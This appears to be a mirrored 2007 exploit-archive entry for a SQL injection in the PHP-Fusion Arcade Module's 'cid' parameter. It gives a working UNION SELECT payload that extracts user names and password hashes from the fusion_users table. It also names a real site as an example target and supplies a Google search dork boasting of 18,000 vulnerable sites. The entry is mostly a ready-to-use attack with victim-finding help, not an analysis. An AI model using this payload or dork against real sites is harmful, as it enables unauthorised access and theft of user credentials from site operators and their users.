Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16590
HistoryApr 05, 2007 - 12:00 a.m.

PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln

2007-04-0500:00:00
vulners.com
308

PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln


Bulan: xoron

xoron.biz


Exploit:

index.php?op=view_game_list&cid=-1//union//select//null,user_name,user_password,null,null,null//from/**/fusion_users/*


Exapmle: http://www.basicwallpapers.dk/infusions/arcade/


Google Dork:
/infusions/arcade/ 18.000 sites:)


Ekin0x / –> evilc0der.org <–


milw0rm.com [2007-04-02]